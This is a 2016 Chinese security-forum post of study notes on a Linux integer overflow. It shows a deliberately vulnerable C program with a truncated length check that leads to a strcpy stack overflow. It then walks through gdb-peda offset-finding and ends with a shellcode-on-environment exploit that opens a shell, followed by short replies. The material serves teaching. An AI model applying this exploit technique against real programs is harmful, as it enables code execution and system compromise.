首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 二进制漏洞
    3. 发新帖
[原创]Linux下面整数溢出,学习笔记分享.
发表于: 2016-5-30 21:56 5424

[原创]Linux下面整数溢出,学习笔记分享.

wangguohao 活跃值
2016-5-30 21:56
5424 

/* filename: vuln.c
 * gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
 */
[*]include <stdio.h>
[*]include <string.h>
[*]include <stdlib.h>

void store_passwd_indb(char* passwd) {
}

void validate_uname(char* uname) {
}

void validate_passwd(char* passwd) {
 char passwd_buf[11];
 unsigned char passwd_len = strlen(passwd); /* [1] */ 
 if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
  printf("Valid Password\n"); /* [3] */ 
  fflush(stdout);
  strcpy(passwd_buf,passwd); /* [4] */
 } else {
  printf("Invalid Password\n"); /* [5] */
  fflush(stdout);
 }
 store_passwd_indb(passwd_buf); /* [6] */
}

int main(int argc, char* argv[]) {
 if(argc!=3) {
  printf("Usage Error:   \n");
  fflush(stdout);
  exit(-1);
 }
 validate_uname(argv[1]);
 validate_passwd(argv[2]);
 return 0;
}


gdb-peda$ r guowang $(python -c 'print "A" * 256')
gdb-peda$ b validate_passwd 
[-------------------------------------code-------------------------------------]
   0x804850d <validate_passwd+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x8048510 <validate_passwd+9>:	mov    DWORD PTR [esp],eax
   0x8048513 <validate_passwd+12>:	call   0x80483e0 <strlen@plt>
=> 0x8048518 <validate_passwd+17>:	mov    BYTE PTR [ebp-0x9],al
   0x804851b <validate_passwd+20>:	cmp    BYTE PTR [ebp-0x9],0x3
   0x804851f <validate_passwd+24>:	jbe    0x8048554 <validate_passwd+77>
   0x8048521 <validate_passwd+26>:	cmp    BYTE PTR [ebp-0x9],0x8
   0x8048525 <validate_passwd+30>:	ja     0x8048554 <validate_passwd+77>
...
gdb-peda$ info registers al
al             0xff	0xff
...
gdb-peda$ b validate_passwd 
...
gdb-peda$ r guowang $(python -c 'print "A" * 256')
...
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804850d <validate_passwd+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x8048510 <validate_passwd+9>:	mov    DWORD PTR [esp],eax
   0x8048513 <validate_passwd+12>:	call   0x80483e0 <strlen@plt>
=> 0x8048518 <validate_passwd+17>:	mov    BYTE PTR [ebp-0x9],al
   0x804851b <validate_passwd+20>:	cmp    BYTE PTR [ebp-0x9],0x3
   0x804851f <validate_passwd+24>:	jbe    0x8048554 <validate_passwd+77>
   0x8048521 <validate_passwd+26>:	cmp    BYTE PTR [ebp-0x9],0x8
   0x8048525 <validate_passwd+30>:	ja     0x8048554 <validate_passwd+77>
...
gdb-peda$ info registers al
al             0x0	0x0

[----------------------------------registers-----------------------------------]
EAX: 0x103 
...
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804850d <validate_passwd+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x8048510 <validate_passwd+9>:	mov    DWORD PTR [esp],eax
   0x8048513 <validate_passwd+12>:	call   0x80483e0 <strlen@plt>
=> 0x8048518 <validate_passwd+17>:	mov    BYTE PTR [ebp-0x9],al
   0x804851b <validate_passwd+20>:	cmp    BYTE PTR [ebp-0x9],0x3
   0x804851f <validate_passwd+24>:	jbe    0x8048554 <validate_passwd+77>
   0x8048521 <validate_passwd+26>:	cmp    BYTE PTR [ebp-0x9],0x8
   0x8048525 <validate_passwd+30>:	ja     0x8048554 <validate_passwd+77>
[------------------------------------stack-------------------------------------]

gdb-peda$ pattern_arg 2 262
Set 2 arguments to program
gdb-peda$ r
...
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
EIP: 0x41414441 ('ADAA')
...
gdb-peda$ r AA $(python -c 'print "A" * 26 + "B" * 4 + "C" * (261-4-26)')
Starting program: /home/guowang/lab/vuln AA $(python -c 'print "A" * 26 + "B" * 4 + "C" * (261-4-26)')
Valid Password

Program received signal SIGSEGV, Segmentation fault.
...
EIP: 0x42424141 ('AABB')
...
gdb-peda$ r AA $(python -c 'print "A" * 24 + "B" * 4 + "C" * (261-4-24)')
Starting program: /home/guowang/lab/vuln AA $(python -c 'print "A" * 24 + "B" * 4 + "C" * (261-4-24)')
Valid Password

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xbffff584 ('A' <repeats 24 times>, "BBBB", 'C' <repeats 172 times>...)
EBX: 0xb7fcd000 --> 0x1a9da8 
ECX: 0xbffff8a0 ("CCCCCCC")
EDX: 0xbffff682 ("CCCCCCC")
ESI: 0x0 
EDI: 0x0 
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff5a0 ('C' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')

guowang@warzone:~/lab$ export SHELLCODE=$(cat shellcode.bin)
guowang@warzone:~/lab$ ./getaddr SHELLCODE ./vuln
SHELLCODE will be at 0xbffff848
guowang@warzone:~/lab$ ./vuln AA $(python -c 'print "A" * 24 + "\x48\xf8\xff\xbf" + "C" * (261-4-24)')
Valid Password
sh-4.3$ id
uid=1042(guowang) gid=1043(guowang) groups=1043(guowang)
sh-4.3$
什么是整数溢出?
类型系统与其的表示范围?
Integer signedness error in the db2dasrrm process in the DB2 Administration Server (DAS) in IBM DB2 9.1 through FP11, 9.5 before FP9, and 9.7 through FP5 on UNIX platforms allows remote attackers to execute arbitrary code via a crafted request that triggers a heap-based buffer overflow.

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 3
支持
分享
最新回复 (4)
wangguohao
雪    币: 262
活跃值: (55)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
私信
2
发错地方了,怎么删除 = = 囧了, 或者版主帮我移动一下.
2016-5-30 22:00
0
kanxue
雪    币: 58782
活跃值: (21921)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
私信
3
移过来了,感谢分享!己转为初级会员了。
文章格式较规范。
2016-5-30 22:02
0
地狱怪客
雪    币: 341
活跃值: (153)
能力值: ( LV7,RANK:110 )
在线值:
发帖
回帖
粉丝
私信
4
cve cve ~~~学习
2016-6-1 11:37
0
知花香
雪    币: 757
活跃值: (21)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
一个成语,虽然不懂但是感觉好深奥
2016-6-7 07:59
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回